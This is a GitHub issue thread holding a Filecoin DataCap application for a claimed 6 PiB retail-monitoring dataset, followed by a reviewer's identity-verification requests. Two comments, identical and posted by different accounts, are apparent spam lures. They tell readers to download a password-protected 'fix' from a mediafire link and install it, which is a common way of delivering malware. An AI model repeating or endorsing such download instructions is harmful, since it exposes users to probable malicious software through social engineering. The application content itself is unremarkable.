### ISSUE TITLE
[DataCap Application] <Cloud Era Cloud Monitoring> - <AI Intelligent Recognition>

### ISSUE THREAD

**Issue by Zzbaoo** [Lind111/EF#22]
### Data Owner Name

Bond

### Data Owner Country/Region

China

### Data Owner Industry

Information, Media & Telecommunications

### Website

http://www.gdysd.cn/

### Social Media Handle

hpjnba@gmail.com

### Social Media Type

Other

### What is your role related to the dataset

Dataset Owner

### Total amount of DataCap being requested

6PiB

### Expected size of single dataset (one copy)

1PiB

### Number of replicas to store

6

### Weekly allocation of DataCap requested

500TiB

### On-chain address for first allocation

f1bvikea2otp5t4u5gm44e7c4xm7yco65trxk3v6i

### Data Type of Application

Public, Open Commercial/Enterprise

### Custom multisig

- [X] Use Custom Multisig

### Share a brief history of your project and organization

```text
Cloud Era Cloud Monitoring Project:
Currently, we are a professional digital upgrade service provider and operator for the retail industry. Our focus is on providing technological upgrades and solutions to address pain points in China's 5.4 trillion yuan physical retail market, offering integrated marketing, transaction, management, and revenue enhancement solutions for convenience stores and branded chain enterprises.
```

### Is this project associated with other projects/ecosystem stakeholders?

No

### Describe the data being stored onto Filecoin

```text
Machine learning models and training data, image and video data, sensor data, customer behavior data, etc.
```

### Where was the data currently stored in this dataset sourced from

My Own Storage Infra

### If you are a data preparer. What is your location (Country/Region)

None

### Please share a sample of the data

```text
http://www.gdysd.cn/
http://www.gdysd.cn/h-col-103.html
http://www.gdysd.cn/h-col-104.html
```

### Confirm that this is a public dataset that can be retrieved by anyone on the Network

- [X] I confirm

### What is the expected retrieval frequency for this data

Daily

### For how long do you plan to keep this dataset stored on Filecoin

More than 3 years

### In which geographies do you plan on making storage deals

Asia other than Greater China

### How will you be distributing your data to storage providers

Cloud storage (i.e. S3), Shipping hard drives

### How did you find your storage providers

Partners

### Please list the provider IDs and location of the storage providers you will be working with.

```text
f03178077 US
f03178144 SG
f03178150 JP
```

### How do you plan to make deals to your storage providers

Boost client, Lotus client, Droplet client

### Can you confirm that you will follow the Fil+ guideline

Yes

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Lind111** [comment]
First, please click on https://github.com/filecoin-project/notary-governance/issues/1056#issuecomment-1890621214 to view my allocation rules

**Comment by Lind111** [comment]
Could you send an email with business license to [qq248245620@gmail.com](mailto:qq248245620@gmail.com) in order to confirm your identity?The email should include the miner ID, the business entity, a list of sps locations you will be working with

**Comment by Lind111** [comment]
Too long without updates will be closed
